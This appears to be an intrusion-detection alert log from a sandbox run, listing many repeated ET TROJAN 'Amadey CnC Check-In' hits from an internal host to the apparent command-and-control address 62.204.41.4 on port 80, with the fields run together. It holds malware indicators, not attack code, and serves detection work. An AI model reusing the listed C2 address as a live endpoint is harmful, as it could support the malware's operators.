                                                                      192.168.2.762.204.41.450180802027700 02/06/23-18:38:00.687932TCP2027700ET TROJAN Amadey CnC Check-In5018080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449754802027700 02/06/23-18:36:04.905748TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449926802027700 02/06/23-18:36:52.489079TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450287802027700 02/06/23-18:38:29.798910TCP2027700ET TROJAN Amadey CnC Check-In5028780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449959802027700 02/06/23-18:37:02.027473TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450226802027700 02/06/23-18:38:13.375752TCP2027700ET TROJAN Amadey CnC Check-In5022680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450324802027700 02/06/23-18:38:38.548279TCP2027700ET TROJAN Amadey CnC Check-In5032480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450290802027700 02/06/23-18:38:30.501538TCP2027700ET TROJAN Amadey CnC Check-In5029080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450116802027700 02/06/23-18:37:43.857816TCP2027700ET TROJAN Amadey CnC Check-In5011680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449962802027700 02/06/23-18:37:02.769565TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450018802027700 02/06/23-18:37:19.057349TCP2027700ET TROJAN Amadey CnC Check-In5001880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450033802027700 02/06/23-18:37:22.700596TCP2027700ET TROJAN Amadey CnC Check-In5003380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450189802027700 02/06/23-18:38:02.860152TCP2027700ET TROJAN Amadey CnC Check-In5018980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449787802027700 02/06/23-18:36:12.665967TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450218802027700 02/06/23-18:38:11.455700TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450152802027700 02/06/23-18:37:54.029428TCP2027700ET TROJAN Amadey CnC Check-In5015280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450365802027700 02/06/23-18:38:50.493705TCP2027700ET TROJAN Amadey CnC Check-In5036580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450282802027700 02/06/23-18:38:28.628161TCP2027700ET TROJAN Amadey CnC Check-In5028280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449995802027700 02/06/23-18:37:11.226045TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450111802027700 02/06/23-18:37:42.623221TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449824802027700 02/06/23-18:36:23.412568TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449741802027700 02/06/23-18:36:01.744620TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449954802027700 02/06/23-18:37:00.821017TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450337802027700 02/06/23-18:38:41.721828TCP2027700ET TROJAN Amadey CnC Check-In5033780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450046802027700 02/06/23-18:37:25.862441TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449759802027700 02/06/23-18:36:06.092268TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450360802027700 02/06/23-18:38:49.288881TCP2027700ET TROJAN Amadey CnC Check-In5036080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449889802027700 02/06/23-18:36:40.164302TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450005802027700 02/06/23-18:37:15.731218TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450259802027700 02/06/23-18:38:21.378414TCP2027700ET TROJAN Amadey CnC Check-In5025980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450087802027700 02/06/23-18:37:36.937901TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450124802027700 02/06/23-18:37:45.767098TCP2027700ET TROJAN Amadey CnC Check-In5012480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450026802027700 02/06/23-18:37:21.007243TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449982802027700 02/06/23-18:37:07.790106TCP2027700ET TROJAN Amadey CnC Check-In4998280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449988802027700 02/06/23-18:37:09.232773TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450255802027700 02/06/23-18:38:20.425505TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449921802027700 02/06/23-18:36:50.850422TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449734802027700 02/06/23-18:36:00.024734TCP2027700ET TROJAN Amadey CnC Check-In4973480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450001802027700 02/06/23-18:37:14.735617TCP2027700ET TROJAN Amadey CnC Check-In5000180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450157802027700 02/06/23-18:37:55.206071TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450353802027700 02/06/23-18:38:47.570344TCP2027700ET TROJAN Amadey CnC Check-In5035380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449725802027700 02/06/23-18:35:56.007022TCP2027700ET TROJAN Amadey CnC Check-In4972580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449823802027700 02/06/23-18:36:23.177069TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449979802027700 02/06/23-18:37:06.951379TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449790802027700 02/06/23-18:36:13.365591TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449832802027700 02/06/23-18:36:25.351769TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450344802027700 02/06/23-18:38:44.257733TCP2027700ET TROJAN Amadey CnC Check-In5034480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450246802027700 02/06/23-18:38:18.266167TCP2027700ET TROJAN Amadey CnC Check-In5024680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450184802027700 02/06/23-18:38:01.659964TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450143802027700 02/06/23-18:37:51.857942TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449781802027700 02/06/23-18:36:11.243044TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450095802027700 02/06/23-18:37:38.824933TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449963802027700 02/06/23-18:37:03.026261TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449893802027700 02/06/23-18:36:41.133872TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449922802027700 02/06/23-18:36:51.089881TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450115802027700 02/06/23-18:37:43.614292TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450185802027700 02/06/23-18:38:01.897079TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449851802027700 02/06/23-18:36:29.678141TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449804802027700 02/06/23-18:36:18.533346TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449762802027700 02/06/23-18:36:06.819557TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450227802027700 02/06/23-18:38:13.624631TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450061802027700 02/06/23-18:37:29.246156TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450316802027700 02/06/23-18:38:36.846930TCP2027700ET TROJAN Amadey CnC Check-In5031680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450020802027700 02/06/23-18:37:19.544837TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450274802027700 02/06/23-18:38:25.337791TCP2027700ET TROJAN Amadey CnC Check-In5027480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450070802027700 02/06/23-18:37:32.801483TCP2027700ET TROJAN Amadey CnC Check-In5007080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449794802027700 02/06/23-18:36:14.301275TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449938802027700 02/06/23-18:36:57.008660TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450073802027700 02/06/23-18:37:33.536848TCP2027700ET TROJAN Amadey CnC Check-In5007380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450058802027700 02/06/23-18:37:28.499164TCP2027700ET TROJAN Amadey CnC Check-In5005880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450156802027700 02/06/23-18:37:54.967951TCP2027700ET TROJAN Amadey CnC Check-In5015680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450067802027700 02/06/23-18:37:31.325633TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449880802027700 02/06/23-18:36:37.960430TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449950802027700 02/06/23-18:36:59.857429TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449766802027700 02/06/23-18:36:07.787301TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450128802027700 02/06/23-18:37:46.748438TCP2027700ET TROJAN Amadey CnC Check-In5012880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449864802027700 02/06/23-18:36:32.756228TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449775802027700 02/06/23-18:36:09.999214TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450214802027700 02/06/23-18:38:10.502845TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449849802027700 02/06/23-18:36:29.177906TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449947802027700 02/06/23-18:36:59.148434TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450042802027700 02/06/23-18:37:24.857893TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450140802027700 02/06/23-18:37:51.157275TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450296802027700 02/06/23-18:38:31.975155TCP2027700ET TROJAN Amadey CnC Check-In5029680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450131802027700 02/06/23-18:37:47.485008TCP2027700ET TROJAN Amadey CnC Check-In5013180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450312802027700 02/06/23-18:38:35.876032TCP2027700ET TROJAN Amadey CnC Check-In5031280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450303802027700 02/06/23-18:38:33.662984TCP2027700ET TROJAN Amadey CnC Check-In5030380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450086802027700 02/06/23-18:37:36.704777TCP2027700ET TROJAN Amadey CnC Check-In5008680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449919802027700 02/06/23-18:36:50.383743TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450299802027700 02/06/23-18:38:32.713859TCP2027700ET TROJAN Amadey CnC Check-In5029980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450045802027700 02/06/23-18:37:25.620164TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450169802027700 02/06/23-18:37:58.055436TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449991802027700 02/06/23-18:37:09.959911TCP2027700ET TROJAN Amadey CnC Check-In4999180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450039802027700 02/06/23-18:37:24.123203TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450017802027700 02/06/23-18:37:18.799281TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450366802027700 02/06/23-18:38:50.739823TCP2027700ET TROJAN Amadey CnC Check-In5036680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449747802027700 02/06/23-18:36:03.176630TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449877802027700 02/06/23-18:36:37.241186TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450112802027700 02/06/23-18:37:42.889738TCP2027700ET TROJAN Amadey CnC Check-In5011280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449966802027700 02/06/23-18:37:03.777402TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449753802027700 02/06/23-18:36:04.648625TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449836802027700 02/06/23-18:36:26.304985TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450283802027700 02/06/23-18:38:28.863963TCP2027700ET TROJAN Amadey CnC Check-In5028380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450325802027700 02/06/23-18:38:38.783317TCP2027700ET TROJAN Amadey CnC Check-In5032580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450201802027700 02/06/23-18:38:05.815511TCP2027700ET TROJAN Amadey CnC Check-In5020180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450242802027700 02/06/23-18:38:17.282353TCP2027700ET TROJAN Amadey CnC Check-In5024280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450331802027700 02/06/23-18:38:40.257821TCP2027700ET TROJAN Amadey CnC Check-In5033180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449900802027700 02/06/23-18:36:42.821925TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450323802027700 02/06/23-18:38:38.290728TCP2027700ET TROJAN Amadey CnC Check-In5032380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449961802027700 02/06/23-18:37:02.522336TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450032802027700 02/06/23-18:37:22.465405TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449878802027700 02/06/23-18:36:37.478498TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450127802027700 02/06/23-18:37:46.506415TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449750802027700 02/06/23-18:36:03.933992TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450050802027700 02/06/23-18:37:26.808863TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449737802027700 02/06/23-18:36:00.769094TCP2027700ET TROJAN Amadey CnC Check-In4973780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449896802027700 02/06/23-18:36:41.854218TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450004802027700 02/06/23-18:37:15.494599TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450341802027700 02/06/23-18:38:42.838470TCP2027700ET TROJAN Amadey CnC Check-In5034180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450356802027700 02/06/23-18:38:48.308768TCP2027700ET TROJAN Amadey CnC Check-In5035680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449994802027700 02/06/23-18:37:10.684632TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449915802027700 02/06/23-18:36:49.430014TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450145802027700 02/06/23-18:37:52.348178TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449793802027700 02/06/23-18:36:14.067336TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449933802027700 02/06/23-18:36:55.825769TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450163802027700 02/06/23-18:37:56.641063TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449755802027700 02/06/23-18:36:05.145544TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450155802027700 02/06/23-18:37:54.734217TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449951802027700 02/06/23-18:37:00.088634TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450060802027700 02/06/23-18:37:28.997105TCP2027700ET TROJAN Amadey CnC Check-In5006080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449827802027700 02/06/23-18:36:24.116181TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449910802027700 02/06/23-18:36:48.230042TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450351802027700 02/06/23-18:38:47.071030TCP2027700ET TROJAN Amadey CnC Check-In5035180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449732802027700 02/06/23-18:35:59.129342TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449809802027700 02/06/23-18:36:19.755075TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450196802027700 02/06/23-18:38:04.592802TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450328802027700 02/06/23-18:38:39.535775TCP2027700ET TROJAN Amadey CnC Check-In5032880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450109802027700 02/06/23-18:37:42.135759TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450178802027700 02/06/23-18:38:00.218801TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449773802027700 02/06/23-18:36:09.507798TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450137802027700 02/06/23-18:37:50.172258TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450333802027700 02/06/23-18:38:40.754989TCP2027700ET TROJAN Amadey CnC Check-In5033380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449810802027700 02/06/23-18:36:19.991660TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450305802027700 02/06/23-18:38:34.163427TCP2027700ET TROJAN Amadey CnC Check-In5030580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450173802027700 02/06/23-18:37:59.034324TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449905802027700 02/06/23-18:36:44.026160TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450210802027700 02/06/23-18:38:09.556488TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450268802027700 02/06/23-18:38:23.521301TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449727802027700 02/06/23-18:35:56.731345TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449868802027700 02/06/23-18:36:33.899866TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450251802027700 02/06/23-18:38:19.454938TCP2027700ET TROJAN Amadey CnC Check-In5025180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450191802027700 02/06/23-18:38:03.374137TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449837802027700 02/06/23-18:36:26.550389TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450168802027700 02/06/23-18:37:57.812117TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450165802027700 02/06/23-18:37:57.109837TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450300802027700 02/06/23-18:38:32.957646TCP2027700ET TROJAN Amadey CnC Check-In5030080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449898802027700 02/06/23-18:36:42.338054TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449981802027700 02/06/23-18:37:07.544608TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449941802027700 02/06/23-18:36:57.711371TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450318802027700 02/06/23-18:38:37.320679TCP2027700ET TROJAN Amadey CnC Check-In5031880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450346802027700 02/06/23-18:38:45.811035TCP2027700ET TROJAN Amadey CnC Check-In5034680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449956802027700 02/06/23-18:37:01.309389TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450030802027700 02/06/23-18:37:21.969699TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449763802027700 02/06/23-18:36:07.067396TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450315802027700 02/06/23-18:38:36.612364TCP2027700ET TROJAN Amadey CnC Check-In5031580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449778802027700 02/06/23-18:36:10.754396TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449800802027700 02/06/23-18:36:16.519327TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449971802027700 02/06/23-18:37:04.988037TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450122802027700 02/06/23-18:37:45.289416TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450278802027700 02/06/23-18:38:27.635526TCP2027700ET TROJAN Amadey CnC Check-In5027880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450107802027700 02/06/23-18:37:41.653833TCP2027700ET TROJAN Amadey CnC Check-In5010780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450022802027700 02/06/23-18:37:20.029901TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449752802027700 02/06/23-18:36:04.410535TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450313802027700 02/06/23-18:38:36.114307TCP2027700ET TROJAN Amadey CnC Check-In5031380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450241802027700 02/06/23-18:38:17.040111TCP2027700ET TROJAN Amadey CnC Check-In5024180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449865802027700 02/06/23-18:36:32.990534TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450193802027700 02/06/23-18:38:03.846258TCP2027700ET TROJAN Amadey CnC Check-In5019380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450200802027700 02/06/23-18:38:05.567462TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449735802027700 02/06/23-18:36:00.278415TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449913802027700 02/06/23-18:36:48.947846TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450063802027700 02/06/23-18:37:29.786603TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449760802027700 02/06/23-18:36:06.332167TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450213802027700 02/06/23-18:38:10.266408TCP2027700ET TROJAN Amadey CnC Check-In5021380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450343802027700 02/06/23-18:38:43.443139TCP2027700ET TROJAN Amadey CnC Check-In5034380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450354802027700 02/06/23-18:38:47.820987TCP2027700ET TROJAN Amadey CnC Check-In5035480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449765802027700 02/06/23-18:36:07.550649TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449902802027700 02/06/23-18:36:43.303336TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449943802027700 02/06/23-18:36:58.182256TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449984802027700 02/06/23-18:37:08.277099TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450135802027700 02/06/23-18:37:49.197725TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450176802027700 02/06/23-18:37:59.752747TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449964802027700 02/06/23-18:37:03.280174TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.762.204.41.4
